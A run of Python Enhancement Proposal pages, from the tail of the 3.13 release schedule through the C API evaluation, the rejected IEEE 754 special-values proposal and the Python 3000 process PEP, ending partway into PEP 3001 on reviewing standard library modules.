3.13.0 alpha 1: Friday, 2023-10-13
3.13.0 alpha 2: Wednesday, 2023-11-22
3.13.0 alpha 3: Wednesday, 2024-01-17
Expected:
3.13.0 alpha 4: Tuesday, 2024-02-13
3.13.0 alpha 5: Tuesday, 2024-03-12
3.13.0 alpha 6: Tuesday, 2024-04-09
3.13.0 beta 1: Tuesday, 2024-05-07
(No new features beyond this point.)
3.13.0 beta 2: Tuesday, 2024-05-28
3.13.0 beta 3: Tuesday, 2024-06-18
3.13.0 beta 4: Tuesday, 2024-07-16
3.13.0 candidate 1: Tuesday, 2024-07-30
3.13.0 candidate 2: Tuesday, 2024-09-03
3.13.0 final: Tuesday, 2024-10-01
Subsequent bugfix releases every two months.
3.13 Lifespan
3.13 will receive bugfix updates approximately every 2 months for
approximately 24 months. Around the time of the release of 3.15.0 final, the
final 3.13 bugfix update will be released. After that, it is expected that
security updates (source only) will be released until 5 years after the
release of 3.13.0 final, so until approximately October 2029.
Copyright
This document is placed in the public domain or under the CC0-1.0-Universal
license, whichever is more permissive.
| Active | PEP 719 – Python 3.13 Release Schedule | Informational | This document describes the development and release schedule for
Python 3.13. |
PEP 733 – An Evaluation of Python’s Public C API
Author:
Erlend Egeberg Aasland <erlend at python.org>,
Domenico Andreoli <domenico.andreoli at linux.com>,
Stefan Behnel <stefan_ml at behnel.de>,
Carl Friedrich Bolz-Tereick <cfbolz at gmx.de>,
Simon Cross <hodgestar at gmail.com>,
Steve Dower <steve.dower at python.org>,
Tim Felgentreff <tim.felgentreff at oracle.com>,
David Hewitt <1939362+davidhewitt at users.noreply.github.com>,
Shantanu Jain <hauntsaninja at gmail.com>,
Wenzel Jakob <wenzel.jakob at epfl.ch>,
Irit Katriel <irit at python.org>,
Marc-Andre Lemburg <mal at lemburg.com>,
Donghee Na <donghee.na at python.org>,
Karl Nelson <nelson85 at llnl.gov>,
Ronald Oussoren <ronaldoussoren at mac.com>,
Antoine Pitrou <solipsis at pitrou.net>,
Neil Schemenauer <nas at arctrix.com>,
Mark Shannon <mark at hotpy.org>,
Stepan Sindelar <stepan.sindelar at oracle.com>,
Gregory P. Smith <greg at krypto.org>,
Eric Snow <ericsnowcurrently at gmail.com>,
Victor Stinner <vstinner at python.org>,
Guido van Rossum <guido at python.org>,
Petr Viktorin <encukou at gmail.com>,
Carol Willing <willingc at gmail.com>,
William Woodruff <william at yossarian.net>,
David Woods <dw-git at d-woods.co.uk>,
Jelle Zijlstra <jelle.zijlstra at gmail.com>
Status:
Draft
Type:
Informational
Created:
16-Oct-2023
Post-History:
01-Nov-2023
Table of Contents
Abstract
Introduction
C API Stakeholders
Common Actions for All Stakeholders
Extension Writers
Authors of Embedded Python Applications
Python Implementations
Alternative APIs and Binding Generators
Strengths of the C API
C API problems
API Evolution and Maintenance
API Specification and Abstraction
Object Reference Management
Type Definition and Object Creation
Error Handling
API Tiers and Stability Guarantees
Use of the C Language
Implementation Flaws
Missing Functionality
Debug Mode
Introspection
Improved Interaction with Other Languages
References
Copyright
Abstract
This informational PEP describes our shared view of the public C API. The
document defines:
purposes of the C API
stakeholders and their particular use cases and requirements
strengths of the C API
problems of the C API categorized into nine areas of weakness
This document does not propose solutions to any of the identified problems. By
creating a shared list of C API issues, this document will help to guide
continuing discussion about change proposals and to identify evaluation
criteria.
Introduction
Python’s C API was not designed for the different purposes it currently
fulfills. It evolved from what was initially the internal API between
the C code of the interpreter and the Python language and libraries.
In its first incarnation, it was exposed to make it possible to embed
Python into C/C++ applications and to write extension modules in C/C++.
These capabilities were instrumental to the growth of Python’s ecosystem.
Over the decades, the C API grew to provide different tiers of stability,
conventions changed, and new usage patterns have emerged, such as bindings
to languages other than C/C++. In the next few years, new developments
are expected to further test the C API, such as the removal of the GIL
and the development of a JIT compiler. However, this growth was not
supported by clearly documented guidelines, resulting in inconsistent
approaches to API design in different subsystems of CPython. In addition,
CPython is no longer the only implementation of Python, and some of the
design decisions made when it was, are difficult for alternative
implementations to work with
[Issue 64].
In the meantime, lessons were learned and mistakes in both the design
and the implementation of the C API were identified.
Evolving the C API is hard due to the combination of backwards
compatibility constraints and its inherent complexity, both
technical and social. Different types of users bring different,
sometimes conflicting, requirements. The tradeoff between stability
and progress is an ongoing, highly contentious topic of discussion
when suggestions are made for incremental improvements.
Several proposals have been put forward for improvement, redesign
or replacement of the C API, each representing a deep analysis of
the problems. At the 2023 Language Summit, three back-to-back
sessions were devoted to different aspects of the C API. There is
general agreement that a new design can remedy the problems that
the C API has accumulated over the last 30 years, while at the
same time updating it for use cases that it was not originally
designed for.
However, there was also a sense at the Language Summit that we are
trying to discuss solutions without a clear common understanding
of the problems that we are trying to solve. We decided that
we need to agree on the current problems with the C API, before
we are able to evaluate any of the proposed solutions. We
therefore created the
capi-workgroup
repository on GitHub in order to collect everyone’s ideas on that
question.
Over 60 different issues were created on that repository, each
describing a problem with the C API. We categorized them and
identified a number of recurring themes. The sections below
mostly correspond to these themes, and each contains a combined
description of the issues raised in that category, along with
links to the individual issues. In addition, we included a section
that aims to identify the different stakeholders of the C API,
and the particular requirements that each of them has.
C API Stakeholders
As mentioned in the introduction, the C API was originally
created as the internal interface between CPython’s
interpreter and the Python layer. It was later exposed as
a way for third-party developers to extend and embed Python
programs. Over the years, new types of stakeholders emerged,
with different requirements and areas of focus. This section
describes this complex state of affairs in terms of the
actions that different stakeholders need to perform through
the C API.
Common Actions for All Stakeholders
There are actions which are generic, and required by
all types of API users:
Define functions and call them
Define new types
Create instances of builtin and user-defined types
Perform operations on object instances
Introspect objects, including types, instances, and functions
Raise and handle exceptions
Import modules
Access to Python’s OS interface
The following sections look at the unique requirements of various stakeholders.
Extension Writers
Extension writers are the traditional users of the C API. Their requirements
are the common actions listed above. They also commonly need to:
Create new modules
Efficiently interface between modules at the C level
Authors of Embedded Python Applications
Applications with an embedded Python interpreter. Examples are
Blender and
OBS.
They need to be able to:
Configure the interpreter (import paths, inittab, sys.argv, memory
allocator, etc.).
Interact with the execution model and program lifetime, including
clean interpreter shutdown and restart.
Represent complex data models in a way Python can use without
having to create deep copies.
Provide and import frozen modules.
Run and manage multiple independent interpreters (in particular, when
embedded in a library that wants to avoid global effects).
Python Implementations
Python implementations such as
CPython,
PyPy,
GraalPy,
IronPython,
RustPython,
MicroPython,
and Jython), may take
very different approaches for the implementation of
different subsystems. They need:
The API to be abstract and hide implementation details.
A specification of the API, ideally with a test suite
that ensures compatibility.
It would be nice to have an ABI that can be shared
across Python implementations.
Alternative APIs and Binding Generators
There are several projects that implement alternatives to the
C API, which offer extension users advantanges over programming
directly with the C API. These APIs are implemented with the
C API, and in some cases by using CPython internals.
There are also libraries that create bindings between Python and
other object models, paradigms or languages.
There is overlap between these categories: binding generators
usually provide alternative APIs, and vice versa.
Examples are
Cython,
cffi,
pybind11 and
nanobind for C++,
PyO3 for Rust,
Shiboken used by
PySide for Qt,
PyGObject for GTK,
Pygolo for Go,
JPype for Java,
PyJNIus for Android,
PyObjC for Objective-C,
SWIG for C/C++,
Python.NET for .NET (C#),
HPy,
Mypyc,
Pythran and
pythoncapi-compat.
CPython’s DSL for parsing function arguments, the
Argument Clinic,
can also be seen as belonging to this category of stakeholders.
Alternative APIs need minimal building blocks for accessing CPython
efficiently. They don’t necessarily need an ergonomic API, because
they typically generate code that is not intended to be read
by humans. But they do need it to be comprehensive enough so that
they can avoid accessing internals, without sacrificing performance.
Binding generators often need to:
Create custom objects (e.g. function/module objects
and traceback entries) that match the behavior of equivalent
Python code as closely as possible.
Dynamically create objects which are static in traditional
C extensions (e.g. classes/modules), and need CPython to manage
their state and lifetime.
Dynamically adapt foreign objects (strings, GC’d containers), with
low overhead.
Adapt external mechanisms, execution models and guarantees to the
Python way (stackful coroutines, continuations,
one-writer-or-multiple-readers semantics, virtual multiple inheritance,
1-based indexing, super-long inheritance chains, goroutines, channels,
etc.).
These tools might also benefit from a choice between a more stable
and a faster (possibly lower-level) API. Their users could
then decide whether they can afford to regenerate the code often or
trade some performance for more stability and less maintenance work.
Strengths of the C API
While the bulk of this document is devoted to problems with the
C API that we would like to see fixed in any new design, it is
also important to point out the strengths of the C API, and to
make sure that they are preserved.
As mentioned in the introduction, the C API enabled the
development and growth of the Python ecosystem over the last
three decades, while evolving to support use cases that it was
not originally designed for. This track record in itself is
indication of how effective and valuable it has been.
A number of specific strengths were mentioned in the
capi-workgroup discussions. Heap types were identified
as much safer and easier to use than static types
[Issue 4].
API functions that take a C string literal for lookups based
on a Python string are very convenient
[Issue 30].
The limited API demonstrates that an API which hides implementation
details makes it easier to evolve Python
[Issue 30].
C API problems
The remainder of this document summarizes and categorizes the problems that were reported on
the capi-workgroup repository.
The issues are grouped into several categories.
API Evolution and Maintenance
The difficulty of making changes in the C API is central to this report. It is
implicit in many of the issues we discuss here, particularly when we need to
decide whether an incremental bugfix can resolve the issue, or whether it can
only be addressed as part of an API redesign
[Issue 44]. The
benefit of each incremental change is often viewed as too small to justify the
disruption. Over time, this implies that every mistake we make in an API’s
design or implementation remains with us indefinitely.
We can take two views on this issue. One is that this is a problem and the
solution needs to be baked into any new C API we design, in the form of a
process for incremental API evolution, which includes deprecation and
removal of API elements. The other possible approach is that this is not
a problem to be solved, but rather a feature of any API. In this
view, API evolution should not be incremental, but rather through large
redesigns, each of which learns from the mistakes of the past and is not
shackled by backwards compatibility requirements (in the meantime, new
API elements may be added, but nothing can ever be removed). A compromise
approach is somewhere between these two extremes, fixing issues which are
easy or important enough to tackle incrementally, and leaving others alone.
The problem we have in CPython is that we don’t have an agreed, official
approach to API evolution. Different members of the core team are pulling in
different directions and this is an ongoing source of disagreements.
Any new C API needs to come with a clear decision about the model
that its maintenance will follow, as well as the technical and
organizational processes by which this will work.
If the model does include provisions for incremental evolution of the API,
it will include processes for managing the impact of the change on users
[Issue 60],
perhaps through introducing an external backwards compatibility module
[Issue 62],
or a new API tier of “blessed” functions
[Issue 55].
API Specification and Abstraction
The C API does not have a formal specification, it is currently defined
as whatever the reference implementation (CPython) contains in a
particular version. The documentation acts as an incomplete description,
which is not sufficient for verifying the correctness of either the full
API, the limited API, or the stable ABI. As a result, the C API may
change significantly between releases without needing a more visible
specification update, and this leads to a number of problems.
Bindings for languages other than C/C++ must parse C code
[Issue 7].
Some C language features are hard to handle in this way, because
they produce compiler-dependent output (such as enums) or require
a C preprocessor/compiler rather than just a parser (such as macros)
[Issue 35].
Furthermore, C header files tend to expose more than what is intended
to be part of the public API
[Issue 34].
In particular, implementation details such as the precise memory
layouts of internal data structures can be exposed
[Issue 22
and PEP 620].
This can make API evolution very difficult, in particular when it
occurs in the stable ABI as in the case of ob_refcnt and ob_type,
which are accessed via the reference counting macros
[Issue 45].
We identified a deeper issue in relation to the way that reference
counting is exposed. The way that C extensions are required to
manage references with calls to Py_INCREF and Py_DECREF is
specific to CPython’s memory model, and is hard for alternative
Python implementations to emulate.
[Issue 12].
Another set of problems arises from the fact that a PyObject* is
exposed in the C API as an actual pointer rather than a handle. The
address of an object serves as its ID and is used for comparison,
and this complicates matters for alternative Python implementations
that move objects during GC
[Issue 37].
A separate issue is that object references are opaque to the runtime,
discoverable only through calls to tp_traverse/tp_clear,
which have their own purposes. If there was a way for the runtime to
know the structure of the object graph, and keep up with changes in it,
this would make it possible for alternative implementations to implement
different memory management schemes
[Issue 33].
Object Reference Management
There does not exist a consistent naming convention for functions
which makes their reference semantics obvious, and this leads to
error prone C API functions, where they do not follow the typical
behaviour. When a C API function returns a PyObject*, the
caller typically gains ownership of a reference to the object.
However, there are exceptions where a function returns a
“borrowed” reference, which the caller can access but does not own
a reference to. Similarly, functions typically do not change the
ownership of references to their arguments, but there are
exceptions where a function “steals” a reference, i.e., the
ownership of the reference is permanently transferred from the
caller to the callee by the call
[Issue 8
and Issue 52].
The terminology used to describe these situations in the documentation
can also be improved
[Issue 11].
A more radical change is necessary in the case of functions that
return “borrowed” references (such as PyList_GetItem)
[Issue 5 and
Issue 21]
or pointers to parts of the internal structure of an object
(such as PyBytes_AsString)
[Issue 57].
In both cases, the reference/pointer is valid for as long as the
owning object holds the reference, but this time is hard to reason about.
Such functions should not exist in the API without a mechanism that can
make them safe.
For containers, the API is currently missing bulk operations on the
references of contained objects. This is particularly important for
a stable ABI where INCREF and DECREF cannot be macros, making
bulk operations expensive when implemented as a sequence of function
calls
[Issue 15].
Type Definition and Object Creation
The C API has functions that make it possible to create incomplete
or inconsistent Python objects, such as PyTuple_New and
PyUnicode_New. This causes problems when the object is tracked
by GC or its tp_traverse/tp_clear functions are called.
A related issue is with functions such as PyTuple_SetItem
which is used to modify a partially initialized tuple (tuples
are immutable once fully initialized)
[Issue 56].
We identified a few issues with type definition APIs. For legacy
reasons, there is often a significant amount of code duplication
between tp_new and tp_vectorcall
[Issue 24].
The type slot function should be called indirectly, so that their
signatures can change to include context information
[Issue 13].
Several aspects of the type definition and creation process are not
well defined, such as which stage of the process is responsible for
initializing and clearing different fields of the type object
[Issue 49].
Error Handling
Error handling in the C API is based on the error indicator which is stored
on the thread state (in global scope). The design intention was that each
API function returns a value indicating whether an error has occurred (by
convention, -1 or NULL). When the program knows that an error
occurred, it can fetch the exception object which is stored in the
error indicator. We identified a number of problems which are related
to error handling, pointing at APIs which are too easy to use incorrectly.
There are functions that do not report all errors that occur while they
execute. For example, PyDict_GetItem clears any errors that occur
when it calls the key’s hash function, or while performing a lookup
in the dictionary
[Issue 51].
Python code never executes with an in-flight exception (by definition),
and typically code using native functions should also be interrupted by
an error being raised. This is not checked in most C API functions, and
there are places in the interpreter where error handling code calls a C API
function while an exception is set. For example, see the call to
PyUnicode_FromString in the error handler of _PyErr_WriteUnraisableMsg
[Issue 2].
There are functions that do not return a value, so a caller is forced to
query the error indicator in order to identify whether an error has occurred.
An example is PyBuffer_Release
[Issue 20].
There are other functions which do have a return value, but this return value
does not unambiguously indicate whether an error has occurred. For example,
PyLong_AsLong returns -1 in case of error, or when the value of the
argument is indeed -1
[Issue 1].
In both cases, the API is error prone because it is possible that the
error indicator was already set before the function was called, and the
error is incorrectly attributed. The fact that the error was not detected
before the call is a bug in the calling code, but the behaviour of the
program in this case doesn’t make it easy to identify and debug the
problem.
There are functions that take a PyObject* argument, with special meaning
when it is NULL. For example, if PyObject_SetAttr receives NULL as
the value to set, this means that the attribute should be cleared. This is error
prone because it could be that NULL indicates an error in the construction
of the value, and the program failed to check for this error. The program will
misinterpret the NULL to mean something different than error
[Issue 47].
API Tiers and Stability Guarantees
The different API tiers provide different tradeoffs of stability vs
API evolution, and sometimes performance.
The stable ABI was identified as an area that needs to be looked into. At
the moment it is incomplete and not widely adopted. At the same time, its
existence is making it hard to make changes to some implementation
details, because it exposes struct fields such as ob_refcnt,
ob_type and ob_size. There was some discussion about whether
the stable ABI is worth keeping. Arguments on both sides can be
found in [Issue 4]
and [Issue 9].
Alternatively, it was suggested that in order to be able to evolve
the stable ABI, we need a mechanism to support multiple versions of
it in the same Python binary. It was pointed out that versioning
individual functions within a single ABI version is not enough
because it may be necessary to evolve, together, a group of functions
that interoperate with each other
[Issue 39].
The limited API was introduced in 3.2 as a blessed subset of the C API
which is recommended for users who would like to restrict themselves
to high quality APIs which are not likely to change often. The
Py_LIMITED_API flag allows users to restrict their program to older
versions of the limited API, but we now need the opposite option, to
exclude older versions. This would make it possible to evolve the
limited API by replacing flawed elements in it
[Issue 54].
More generally, in a redesign we should revisit the way that API
tiers are specified and consider designing a method that will unify the
way we currently select between the different tiers
[Issue 59].
API elements whose names begin with an underscore are considered
private, essentially an API tier with no stability guarantees.
However, this was only clarified recently, in PEP 689. It is
not clear what the change policy should be with respect to such
API elements that predate PEP 689
[Issue 58].
There are API functions which have an unsafe (but fast) version as well as
a safe version which performs error checking (for example,
PyTuple_GET_ITEM vs PyTuple_GetItem). It may help to
be able to group them into their own tiers - the “unsafe API” tier and
the “safe API” tier
[Issue 61].
Use of the C Language
A number of issues were raised with respect to the way that CPython
uses the C language. First there is the issue of which C dialect
we use, and how we test our compatibility with it, as well as API
header compatibility with C++ dialects
[Issue 42].
Usage of const in the API is currently sparse, but it is not
clear whether this is something that we should consider changing
[Issue 38].
We currently use the C types long and int, where fixed-width integers
such as int32_t and int64_t may now be better choices
[Issue 27].
We are using C language features which are hard for other languages
to interact with, such as macros, variadic arguments, enums, bitfields,
and non-function symbols
[Issue 35].
There are API functions that take a PyObject* arg which must be
of a more specific type (such as PyTuple_Size, which fails if
its arg is not a PyTupleObject*). It is an open question whether this
is a good pattern to have, or whether the API should expect the
more specific type
[Issue 31].
There are functions in the API that take concrete types, such as
PyDict_GetItemString which performs a dictionary lookup for a key
specified as a C string rather than PyObject*. At the same time,
for PyDict_ContainsString it is not considered appropriate to
add a concrete type alternative. The principle around this should
be documented in the guidelines
[Issue 23].
Implementation Flaws
Below is a list of localized implementation flaws. Most of these can
probably be fixed incrementally, if we choose to do so. They should,
in any case, be avoided in any new API design.
There are functions that don’t follow the convention of
returning 0 for success and -1 for failure. For
example, PyArg_ParseTuple returns 0 for success and
non-zero for failure
[Issue 25].
The macros Py_CLEAR and Py_SETREF access their arg more than
once, so if the arg is an expression with side effects, they are
duplicated
[Issue 3].
The meaning of Py_SIZE depends on the type and is not always
reliable
[Issue 10].
Some API function do not have the same behaviour as their Python
equivalents. The behaviour of PyIter_Next is different from
tp_iternext.
[Issue 29].
The behaviour of PySet_Contains is different from set.__contains__
[Issue 6].
The fact that PyArg_ParseTupleAndKeywords takes a non-const
char* array as argument makes it more difficult to use
[Issue 28].
Python.h does not expose the whole API. Some headers (like marshal.h)
are not included from Python.h.
[Issue 43].
Naming
PyLong and PyUnicode use names which no longer match the Python
types they represent (int/str). This could be fixed in a new API
[Issue 14].
There are identifiers in the API which are lacking a Py/_Py
prefix
[Issue 46].
Missing Functionality
This section consists of a list of feature requests, i.e., functionality
that was identified as missing in the current C API.
Debug Mode
A debug mode that can be activated without recompilation and which
activates various checks that can help detect various types of errors
[Issue 36].
Introspection
There aren’t currently reliable introspection capabilities for objects
defined in C in the same way as there are for Python objects
[Issue 32].
Efficient type checking for heap types
[Issue 17].
Improved Interaction with Other Languages
Interfacing with other GC based languages, and integrating their
GC with Python’s GC
[Issue 19].
Inject foreign stack frames to the traceback
[Issue 18].
Concrete strings that can be used in other languages
[Issue 16].
References
Python/C API Reference Manual
2023 Language Summit Blog Post: Three Talks on the C API
capi-workgroup on GitHub
Irit’s Core Sprint 2023 slides about C API workgroup
Petr’s Core Sprint 2023 slides
HPy team’s Core Sprint 2023 slides for Things to Learn from HPy
Victor’s slides of Core Sprint 2023 Python C API talk
The Python’s stability promise — Cristián Maureira-Fredes, PySide maintainer
Report on the issues PySide had 5 years ago when switching to the stable ABI
Copyright
This document is placed in the public domain or under the
CC0-1.0-Universal license, whichever is more permissive.
| Draft | PEP 733 – An Evaluation of Python’s Public C API | Informational | This informational PEP describes our shared view of the public C API. The
document defines: |
PEP 754 – IEEE 754 Floating Point Special Values
Author:
Gregory R. Warnes <gregory_r_warnes at groton.pfizer.com>
Status:
Rejected
Type:
Standards Track
Created:
28-Mar-2003
Python-Version:
2.3
Post-History:
Table of Contents
Rejection Notice
Abstract
Rationale
API Definition
Constants
Functions
Example
Implementation
References
Copyright
Rejection Notice
This PEP has been rejected. After sitting open for four years, it has
failed to generate sufficient community interest.
Several ideas of this PEP were implemented for Python 2.6. float('inf')
and repr(float('inf')) are now guaranteed to work on every supported
platform with IEEE 754 semantics. However the eval(repr(float('inf')))
roundtrip is still not supported unless you define inf and nan yourself:
>>> inf = float('inf')
>>> inf, 1E400
(inf, inf)
>>> neginf = float('-inf')
>>> neginf, -1E400
(-inf, -inf)
>>> nan = float('nan')
>>> nan, inf * 0.
(nan, nan)
The math and the sys module also have gained additional features,
sys.float_info, math.isinf, math.isnan, math.copysign.
Abstract
This PEP proposes an API and a provides a reference module that
generates and tests for IEEE 754 double-precision special values:
positive infinity, negative infinity, and not-a-number (NaN).
Rationale
The IEEE 754 standard defines a set of binary representations and
algorithmic rules for floating point arithmetic. Included in the
standard is a set of constants for representing special values,
including positive infinity, negative infinity, and indeterminate or
non-numeric results (NaN). Most modern CPUs implement the
IEEE 754 standard, including the (Ultra)SPARC, PowerPC, and x86
processor series.
Currently, the handling of IEEE 754 special values in Python depends
on the underlying C library. Unfortunately, there is little
consistency between C libraries in how or whether these values are
handled. For instance, on some systems “float(‘Inf’)” will properly
return the IEEE 754 constant for positive infinity. On many systems,
however, this expression will instead generate an error message.
The output string representation for an IEEE 754 special value also
varies by platform. For example, the expression “float(1e3000)”,
which is large enough to generate an overflow, should return a string
representation corresponding to IEEE 754 positive infinity. Python
2.1.3 on x86 Debian Linux returns “inf”. On Sparc Solaris 8 with
Python 2.2.1, this same expression returns “Infinity”, and on
MS-Windows 2000 with Active Python 2.2.1, it returns “1.#INF”.
Adding to the confusion, some platforms generate one string on
conversion from floating point and accept a different string for
conversion to floating point. On these systems
float(str(x))
will generate an error when “x” is an IEEE special value.
In the past, some have recommended that programmers use expressions
like:
PosInf = 1e300**2
NaN = PosInf/PosInf
to obtain positive infinity and not-a-number constants. However, the
first expression generates an error on current Python interpreters. A
possible alternative is to use:
PosInf = 1e300000
NaN = PosInf/PosInf
While this does not generate an error with current Python
interpreters, it is still an ugly and potentially non-portable hack.
In addition, defining NaN in this way does solve the problem of
detecting such values. First, the IEEE 754 standard provides for an
entire set of constant values for Not-a-Number. Second, the standard
requires that
NaN != X
for all possible values of X, including NaN. As a consequence
NaN == NaN
should always evaluate to false. However, this behavior also is not
consistently implemented. [e.g. Cygwin Python 2.2.2]
Due to the many platform and library inconsistencies in handling IEEE
special values, it is impossible to consistently set or detect IEEE
754 floating point values in normal Python code without resorting to
directly manipulating bit-patterns.
This PEP proposes a standard Python API and provides a reference
module implementation which allows for consistent handling of IEEE 754
special values on all supported platforms.
API Definition
Constants
NaNNon-signalling IEEE 754 “Not a Number” value
PosInfIEEE 754 Positive Infinity value
NegInfIEEE 754 Negative Infinity value
Functions
isNaN(value)Determine if the argument is an IEEE 754 NaN (Not a Number) value.
isPosInf(value)Determine if the argument is an IEEE 754 positive infinity value.
isNegInf(value)Determine if the argument is an IEEE 754 negative infinity value.
isFinite(value)Determine if the argument is a finite IEEE 754 value (i.e., is
not NaN, positive, or negative infinity).
isInf(value)Determine if the argument is an infinite IEEE 754 value (positive
or negative infinity)
Example
(Run under Python 2.2.1 on Solaris 8.)
>>> import fpconst
>>> val = 1e30000 # should be cause overflow and result in "Inf"
>>> val
Infinity
>>> fpconst.isInf(val)
1
>>> fpconst.PosInf
Infinity
>>> nval = val/val # should result in NaN
>>> nval
NaN
>>> fpconst.isNaN(nval)
1
>>> fpconst.isNaN(val)
0
Implementation
The reference implementation is provided in the module “fpconst” [1],
which is written in pure Python by taking advantage of the “struct”
standard module to directly set or test for the bit patterns that
define IEEE 754 special values. Care has been taken to generate
proper results on both big-endian and little-endian machines. The
current implementation is pure Python, but some efficiency could be
gained by translating the core routines into C.
Patch 1151323 “New fpconst module” [2] on SourceForge adds the
fpconst module to the Python standard library.
References
See http://babbage.cs.qc.edu/courses/cs341/IEEE-754references.html for
reference material on the IEEE 754 floating point standard.
[1]
Further information on the reference package is available at
http://research.warnes.net/projects/rzope/fpconst/
[2]
http://sourceforge.net/tracker/?func=detail&aid=1151323&group_id=5470&atid=305470
Copyright
This document has been placed in the public domain.
| Rejected | PEP 754 – IEEE 754 Floating Point Special Values | Standards Track | This PEP proposes an API and a provides a reference module that
generates and tests for IEEE 754 double-precision special values:
positive infinity, negative infinity, and not-a-number (NaN). |
PEP 801 – Reserved
Author:
Barry Warsaw <barry at python.org>
Status:
Active
Type:
Informational
Created:
21-Jun-2018
Table of Contents
Abstract
Copyright
Abstract
This PEP is reserved for future use, because
We are the 801.
Contact the author for details.
Copyright
This document has been placed in the public domain.
| Active | PEP 801 – Reserved | Informational | This PEP is reserved for future use, because
We are the 801.
Contact the author for details. |
PEP 3000 – Python 3000
Author:
Guido van Rossum <guido at python.org>
Status:
Final
Type:
Process
Created:
05-Apr-2006
Post-History:
Table of Contents
Abstract
Naming
PEP Numbering
Timeline
Compatibility and Transition
Implementation Language
Meta-Contributions
References
Copyright
Abstract
This PEP sets guidelines for Python 3000 development. Ideally, we
first agree on the process, and start discussing features only after
the process has been decided and specified. In practice, we’ll be
discussing features and process simultaneously; often the debate about
a particular feature will prompt a process discussion.
Naming
Python 3000, Python 3.0 and Py3K are all names for the same thing.
The project is called Python 3000, or abbreviated to Py3k. The actual
Python release will be referred to as Python 3.0, and that’s
what “python3.0 -V” will print; the actual file names will use the
same naming convention we use for Python 2.x. I don’t want to pick a
new name for the executable or change the suffix for Python source
files.
PEP Numbering
Python 3000 PEPs are numbered starting at PEP 3000. PEPs 3000-3099
are meta-PEPs – these can be either process or informational PEPs.
PEPs 3100-3999 are feature PEPs. PEP 3000 itself (this PEP) is
special; it is the meta-PEP for Python 3000 meta-PEPs (IOW it describe
the process to define processes). PEP 3100 is also special; it’s a
laundry list of features that were selected for (hopeful) inclusion in
Python 3000 before we started the Python 3000 process for real. PEP
3099, finally, is a list of features that will not change.
Timeline
See PEP 361, which contains the release schedule for Python
2.6 and 3.0. These versions will be released in lockstep.
Note: standard library development is expected to ramp up after 3.0a1
is released.
I expect that there will be parallel Python 2.x and 3.x releases for
some time; the Python 2.x releases will continue for a longer time
than the traditional 2.x.y bugfix releases. Typically, we stop
releasing bugfix versions for 2.x once version 2.(x+1) has been
released. But I expect there to be at least one or two new 2.x
releases even after 3.0 (final) has been released, probably well into
3.1 or 3.2. This will to some extent depend on community demand for
continued 2.x support, acceptance and stability of 3.0, and volunteer
stamina.
I expect that Python 3.1 and 3.2 will be released much sooner after
3.0 than has been customary for the 2.x series. The 3.x release
pattern will stabilize once the community is happy with 3.x.
Compatibility and Transition
Python 3.0 will break backwards compatibility with Python 2.x.
There is no requirement that Python 2.6 code will run unmodified on
Python 3.0. Not even a subset. (Of course there will be a tiny
subset, but it will be missing major functionality.)
Python 2.6 will support forward compatibility in the following two
ways:
It will support a “Py3k warnings mode” which will warn dynamically
(i.e. at runtime) about features that will stop working in Python
3.0, e.g. assuming that range() returns a list.
It will contain backported versions of many Py3k features, either
enabled through __future__ statements or simply by allowing old and
new syntax to be used side-by-side (if the new syntax would be a
syntax error in 2.x).
Instead, and complementary to the forward compatibility features in
2.6, there will be a separate source code conversion tool [1]. This
tool can do a context-free source-to-source translation. For example,
it can translate apply(f, args) into f(*args). However, the
tool cannot do data flow analysis or type inferencing, so it simply
assumes that apply in this example refers to the old built-in
function.
The recommended development model for a project that needs to support
Python 2.6 and 3.0 simultaneously is as follows:
You should have excellent unit tests with close to full coverage.
Port your project to Python 2.6.
Turn on the Py3k warnings mode.
Test and edit until no warnings remain.
Use the 2to3 tool to convert this source code to 3.0 syntax.
Do not manually edit the output!
Test the converted source code under 3.0.
If problems are found, make corrections to the 2.6 version
of the source code and go back to step 3.
When it’s time to release, release separate 2.6 and 3.0 tarballs
(or whatever archive form you use for releases).
It is recommended not to edit the 3.0 source code until you are ready
to reduce 2.6 support to pure maintenance (i.e. the moment when you
would normally move the 2.6 code to a maintenance branch anyway).
PS. We need a meta-PEP to describe the transitional issues in detail.
Implementation Language
Python 3000 will be implemented in C, and the implementation will be
derived as an evolution of the Python 2 code base. This reflects my
views (which I share with Joel Spolsky [2]) on the dangers of complete
rewrites. Since Python 3000 as a language is a relatively mild
improvement on Python 2, we can gain a lot by not attempting to
reimplement the language from scratch. I am not against parallel
from-scratch implementation efforts, but my own efforts will be
directed at the language and implementation that I know best.
Meta-Contributions
Suggestions for additional text for this PEP are gracefully accepted
by the author. Draft meta-PEPs for the topics above and additional
topics are even more welcome!
References
[1]
The 2to3 tool, in the subversion sandbox
http://svn.python.org/view/sandbox/trunk/2to3/
[2]
Joel on Software: Things You Should Never Do, Part I
http://www.joelonsoftware.com/articles/fog0000000069.html
Copyright
This document has been placed in the public domain.
| Final | PEP 3000 – Python 3000 | Process | This PEP sets guidelines for Python 3000 development. Ideally, we
first agree on the process, and start discussing features only after
the process has been decided and specified. In practice, we’ll be
discussing features and process simultaneously; often the debate about
a particular feature will prompt a process discussion. |
PEP 3001 – Procedure for reviewing and improving standard library modules
Author:
Georg Brandl <georg at python.org>
Status:
Withdrawn
Type:
Process
Created:
05-Apr-2006
Post-History:
Table of Contents
Abstract
Removal of obsolete modules
Renaming modules
Code cleanup
Enhancement of test and documentation coverage
Unification of module metadata
Backwards incompatible bug fixes
Interface changes
References
Copyright
Abstract
This PEP describes a procedure for reviewing and improving standard
library modules, especially those written in Python, making them ready
for Python 3000. There can be different steps of refurbishing, each
of which is described in a section below. Of course, not every step
has to be performed for every module.
Removal of obsolete modules
All modules marked as deprecated in 2.x versions should be removed for
Python 3000. The same applies to modules which are seen as obsolete today,
but are too widely used to be deprecated or removed. Python 3000 is the
big occasion to get rid of them.
There will have to be a document listing all removed modules, together
with information on possible substitutes or alternatives. This
information will also have to be provided by the python3warn.py porting
helper script mentioned in PEP XXX.
Renaming modules
There are proposals for a “great stdlib renaming” introducing a hierarchic
library namespace or a top-level package from which to import standard
modules. That possibility aside, some modules’ names are known to have
been chosen unwisely, a mistake which could never be corrected in the 2.x
series. Examples are names like “StringIO” or “Cookie”. For Python 3000,
there will be the possibility to give those modules less confusing and
more conforming names.
Of course, each rename will have to be stated in the documentation of
the respective module and perhaps in the global document of Step 1.
Additionally, the python3warn.py script will recognize the old module
names and notify the user accordingly.
If the name change is made in time for another release of the Python 2.x
series, it is worth considering to introduce the new name in the 2.x
branch to ease transition.
Code cleanup
As most library modules written in Python have not been touched except
for bug fixes, following the policy of never changing a running system,
many of them may contain code that is not up to the newest language
features and could be rewritten in a more concise, modern Python.
